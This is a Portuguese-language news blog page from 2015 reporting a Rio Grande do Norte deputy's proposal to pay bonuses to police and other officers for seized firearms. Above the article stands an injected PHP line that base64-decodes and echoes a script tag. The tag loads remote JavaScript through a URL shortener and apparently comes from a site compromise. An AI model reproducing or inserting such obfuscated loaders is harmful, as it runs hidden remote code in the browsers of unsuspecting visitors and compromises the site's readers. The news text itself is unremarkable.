$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Deputado propõe gratificação a policiais por armas apreendidas

Deputado propõe gratificação a policiais por armas apreendidas
02 Out 2015

O deputado estadual George Soares (PR) apresentou uma sugestão para incentivar a apreensão de armas por policiais, bombeiros e agentes penitenciários. O parlamentar pretende aprovar lei que concede gratificação por cada arma apreendida no Rio Grande do Norte.

Por ser uma proposta de iniciativa exclusiva do Poder Executivo, o deputado encaminhou um requerimento sugerindo que o governador Robinson Faria (PSD) apresente o projeto de lei encartado no requerimento. Na proposta, ficou a cargo do Executivo definir os valores a serem pagos pelas armas apreendidas, variando de acordo com o tipo e calibre.

No projeto sugerido pelo deputado George Soares, teriam direito às gratificações policiais civis e militares que apreendessem armas, independente de estarem em serviço. Além deles, também teriam direito à remuneração extra bombeiros militares, agentes e inspetores de trânsito do Detran e agentes penitenciários, desde que estivessem de serviço no momento das apreensões. Os valores seriam divididos em partes iguais a todos os participantes de operações que resultassem nas apreensões e seriam pagam integralmente caso realizassem a apreensão sozinhos.

No caso das apreensões efetuadas por militares ou servidores afastados das funções por motivos disciplinares, preventivos ou cumprimento de penas, os valores não serão pagos, assim como também não há a previsão de pagamento da gratificação às armas apreendidas dentro de presídios.

Pela lei sugerida pelo deputado, os valores das gratificações seriam pagos aos servidores pelas corporações das quais eles fazem parte, com recursos do Tesouro Estadual.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *